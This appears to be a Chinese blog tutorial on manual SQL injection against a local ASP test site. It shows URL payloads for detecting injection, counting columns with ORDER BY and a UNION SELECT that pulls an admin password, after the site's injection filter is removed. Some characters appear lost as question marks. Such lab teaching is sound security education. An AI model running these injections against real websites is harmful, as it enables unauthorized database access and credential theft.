手把手注入門之手注過程

Hello大家好，我是大老李

手把手學基礎手注（三）

上篇文章我們講到了配置asp的漏洞環境

那麼現在我們來進行手注

手注的話建議大家用火狐遊覽器（文末90sec火狐遊覽器百度雲下載鏈接）

判斷有無注入點

?????????

發現被攔截了

這樣作為新手教學我們需要去改一下代碼

C:Documents and SettingsAdministrator桌面aspIncCheck_Sql.asp?????????

將其刪除

再去打』提示找不到圖片（報錯）

And 1=1返回正常

And 1=2返回錯誤

判斷其存在注入

http://192.168.1.245/ProductShow.asp?ID=500 order by 10

判斷欄位值

10返回正常

20返回正常

25返回錯誤

23返回錯誤

21依然返回錯誤

判斷欄位值為20

http://192.168.1.245/ProductShow.asp?ID=500 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

聯合查詢

http://192.168.1.245/ProductShow.asp?ID=500 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin

解密結果為a-123456

一次手注完結

經常搞站有損身心健康，不如來碗老李雞湯

網易雲音樂關注電台：吾愛雞湯

下載鏈接：鏈接：http://pan.baidu.com/s/1bo65Maz密碼：3h8i

有任何不懂得，可在下方留言，老李隨時為你解答

ps：文章為本人原創，辛苦寫的，如果你覺得你技術好，可以不看。

你會喜歡

記一次艱難上傳-Mssql sa注入中文路徑亂碼&解決！

burp結合sqlmap進行後台登錄框post注入

sql注入介紹

推薦閱讀：